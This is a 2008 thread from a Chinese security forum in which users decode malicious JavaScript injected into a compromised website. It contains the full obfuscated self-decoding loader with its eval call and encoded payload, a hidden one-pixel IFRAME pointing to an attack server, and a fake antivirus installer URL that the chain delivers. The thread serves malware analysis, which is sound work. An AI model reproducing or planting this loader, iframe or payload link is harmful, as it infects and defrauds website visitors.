挂马，解不出来。。

显示全部楼层 · 发表于 2008-2-13 17:33:37

hxxp://www.knoxvoice.com

function A085aTubF(mXSYkqH0X){var eJmF3VT3H=arguments.callee.toString().replace(/\W/g,'').toUpperCase();var gMKy026SO;var PwgNCEKQL;var Oq32NWn5D=eJmF3VT3H.length;var fgMN0vK2r;var I3qVh4gPT='';var RsIkkqdYi=new Array();for(PwgNCEKQL=0;PwgNCEKQL<256;PwgNCEKQL++)RsIkkqdYi[PwgNCEKQL]=0;var gMKy026SO=1;for(PwgNCEKQL=128;PwgNCEKQL;PwgNCEKQL>>=1) {gMKy026SO=(gMKy026SO>>>1)^((gMKy026SO&1)?3988292384:0);for(hQr84280m=0;hQr84280m<256;hQr84280m+=PwgNCEKQL*2) {RsIkkqdYi[hQr84280m+PwgNCEKQL]=(RsIkkqdYi[hQr84280m]^gMKy026SO);if (RsIkkqdYi[hQr84280m+PwgNCEKQL] < 0) {RsIkkqdYi[hQr84280m+PwgNCEKQL]+=4294967296;}}}fgMN0vK2r=4294967295;for(gMKy026SO=0;gMKy026SO<Oq32NWn5D;gMKy026SO++){fgMN0vK2r=RsIkkqdYi[(fgMN0vK2r^eJmF3VT3H.charCodeAt(gMKy026SO))&255]^((fgMN0vK2r>>8)&16777215);}var xy3D07u0l=new Array();var FSB4JaYie=2323;fgMN0vK2r=fgMN0vK2r^4294967295;if (fgMN0vK2r<0) {fgMN0vK2r+=4294967296;}fgMN0vK2r=fgMN0vK2r.toString(16).toUpperCase();var IA17ef3d3=new Array();var Oq32NWn5D=fgMN0vK2r.length;for(PwgNCEKQL=0;PwgNCEKQL<8;PwgNCEKQL++) {var va31p5um0=Oq32NWn5D+PwgNCEKQL;xy3D07u0l[PwgNCEKQL]=1;xy3D07u0l[PwgNCEKQL]=FSB4JaYie;if (va31p5um0>=8) {va31p5um0=va31p5um0-8;IA17ef3d3[PwgNCEKQL]=fgMN0vK2r.charCodeAt(va31p5um0);} else {IA17ef3d3[PwgNCEKQL]=48;}}var bqjtxUvBR=0;var e3FP5e1M6;var EHxDfdAM5;var gYG3w86bd;Oq32NWn5D=mXSYkqH0X.length;gYG3w86bd=Oq32NWn5D;FSB4JaYie=1123;FSB4JaYie=gYG3w86bd;for(PwgNCEKQL=0;PwgNCEKQL<Oq32NWn5D;PwgNCEKQL+=2){var EWX1TnOBq=mXSYkqH0X.substr(PwgNCEKQL,2);e3FP5e1M6=parseInt(EWX1TnOBq,16);EHxDfdAM5=e3FP5e1M6-IA17ef3d3[bqjtxUvBR];if(EHxDfdAM5<0) {EHxDfdAM5=EHxDfdAM5+256;}I3qVh4gPT+=String.fromCharCode(EHxDfdAM5);gYG3w86bd++;FSB4JaYie=3891;if(bqjtxUvBR<IA17ef3d3.length-1) {bqjtxUvBR++;FSB4JaYie=1092;xy3D07u0l[PwgNCEKQL]=20;} else {bqjtxUvBR=0;FSB4JaYie=PwgNCEKQL;}}eval(I3qVh4gPT);}
A085aTubF('AAA4a7A8a3A8A2a974acB69CAAA85C5c829eAAA597B09955B9a7a77058ABa8A9b66f73626D7C6266796a72646E746266796d73969Dac6197afA3739ca471979Caf74b470ABB699A7785764aa9Fa7a89d8357755556ab999Ead9DB87058745655B9A9bd9f9b805697b5A7a898A87d5465b6AD667172729d9Bb896b198746A5d70');

应该是这一段

突然看到了一个eval..

显示全部楼层 · 发表于 2008-2-13 17:37:45

可以参看刺猬的解密：
http://hi.baidu.com/dikex/blog/item/14344c8d0a957416b21bba7b.html

其实还有一种很淫荡的方法

显示全部楼层 · 发表于 2008-2-13 17:40:09

><IFRAME style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px" src="http://79.135.181.138/cgi-bin/in.cgi?p=user2" width=1 height=1></IFRAME>

显示全部楼层 · 发表于 2008-2-13 17:40:12

这个就是国外流行的
与国内截然不同的风格...

显示全部楼层 · 发表于 2008-2-13 17:48:05

为什么我按照那个改成这样执行了一点反应都没有

<html>
<textarea id="textareaID" rows="36" cols="100"></textarea>
<script language="JavaScript">
var gggg=("function A085aTubF(mXSYkqH0X){var

eJmF3VT3H=arguments.callee.toString().replace(/\W/g,'').toUpperCase

();var gMKy026SO;var PwgNCEKQL;var Oq32NWn5D=eJmF3VT3H.length;var

fgMN0vK2r;var I3qVh4gPT='';var RsIkkqdYi=new Array();for

(PwgNCEKQL=0;PwgNCEKQL<256;PwgNCEKQL++)RsIkkqdYi[PwgNCEKQL]=0;var

gMKy026SO=1;for(PwgNCEKQL=128;PwgNCEKQL;PwgNCEKQL>>=1) {gMKy026SO=

(gMKy026SO>>>1)^((gMKy026SO&1)?3988292384:0);for

(hQr84280m=0;hQr84280m<256;hQr84280m+=PwgNCEKQL*2) {RsIkkqdYi

[hQr84280m+PwgNCEKQL]=(RsIkkqdYi[hQr84280m]^gMKy026SO);if (RsIkkqdYi

[hQr84280m+PwgNCEKQL] < 0) {RsIkkqdYi[hQr84280m+PwgNCEKQL]

+=4294967296;}}}fgMN0vK2r=4294967295;for

(gMKy026SO=0;gMKy026SO<Oq32NWn5D;gMKy026SO++){fgMN0vK2r=RsIkkqdYi

[(fgMN0vK2r^eJmF3VT3H.charCodeAt(gMKy026SO))&255]^((fgMN0vK2r>>8)

&16777215);}"var xy3D07u0l=new Array();var

FSB4JaYie=2323;fgMN0vK2r=fgMN0vK2r^4294967295;if (fgMN0vK2r<0)

{fgMN0vK2r+=4294967296;}fgMN0vK2r=fgMN0vK2r.toString(16).toUpperCase

();var IA17ef3d3=new Array();var Oq32NWn5D=fgMN0vK2r.length;for

(PwgNCEKQL=0;PwgNCEKQL<8;PwgNCEKQL++) {var

va31p5um0=Oq32NWn5D+PwgNCEKQL;xy3D07u0l[PwgNCEKQL]=1;xy3D07u0l

[PwgNCEKQL]=FSB4JaYie;if (va31p5um0>=8) {va31p5um0=va31p5um0-

8;IA17ef3d3[PwgNCEKQL]=fgMN0vK2r.charCodeAt(va31p5um0);} else

{IA17ef3d3[PwgNCEKQL]=48;}}var bqjtxUvBR=0;var e3FP5e1M6;var

EHxDfdAM5;var

gYG3w86bd;Oq32NWn5D=mXSYkqH0X.length;gYG3w86bd=Oq32NWn5D;FSB4JaYie=112

3;FSB4JaYie=gYG3w86bd;for

(PwgNCEKQL=0;PwgNCEKQL<Oq32NWn5D;PwgNCEKQL+=2){var

EWX1TnOBq=mXSYkqH0X.substr(PwgNCEKQL,2);e3FP5e1M6=parseInt

(EWX1TnOBq,16);EHxDfdAM5=e3FP5e1M6-IA17ef3d3[bqjtxUvBR];if

(EHxDfdAM5<0) {EHxDfdAM5=EHxDfdAM5+256;}

I3qVh4gPT+=String.fromCharCode

(EHxDfdAM5);gYG3w86bd++;FSB4JaYie=3891;if(bqjtxUvBR<IA17ef3d3.length-

1) {bqjtxUvBR++;FSB4JaYie=1092;xy3D07u0l[PwgNCEKQL]=20;} else

{bqjtxUvBR=0;FSB4JaYie=PwgNCEKQL;}}eval(I3qVh4gPT);}");


</script>
<body onLoad="
A085aTubF

('AAA4a7A8a3A8A2a974acB69CAAA85C5c829eAAA597B09955B9a7a77058ABa8A9b66f

73626D7C6266796a72646E746266796d73969Dac6197afA3739ca471979Caf74b470AB

B699A7785764aa9Fa7a89d8357755556ab999Ead9DB87058745655B9A9bd9f9b805697

b5A7a898A87d5465b6AD667172729d9Bb896b198746A5d70')">
</body>
</html>

显示全部楼层 · 发表于 2008-2-13 17:50:22

关键原函数不能改变连空格回车也不能改变
原封不动付给一个变量

显示全部楼层 · 发表于 2008-2-13 17:50:49

http://anti-virus-pro.com/avp/antivirusproinstaller_170.exe

往下解2层应该是挂了这个

显示全部楼层 · 发表于 2008-2-13 17:51:21

原来如此我加了N个回车在里面

显示全部楼层 · 发表于 2008-2-13 17:52:14

用文本框还不如直接用document.write

[ 本帖最后由 rappar 于 2008-2-13 17:56 编辑 ]

显示全部楼层 · 发表于 2008-2-13 17:52:36

看到了IMON新启发

[已鉴定] 挂马，解不出来。。

回复 3楼 rappar 的帖子

回复 6楼 jimmyleo 的帖子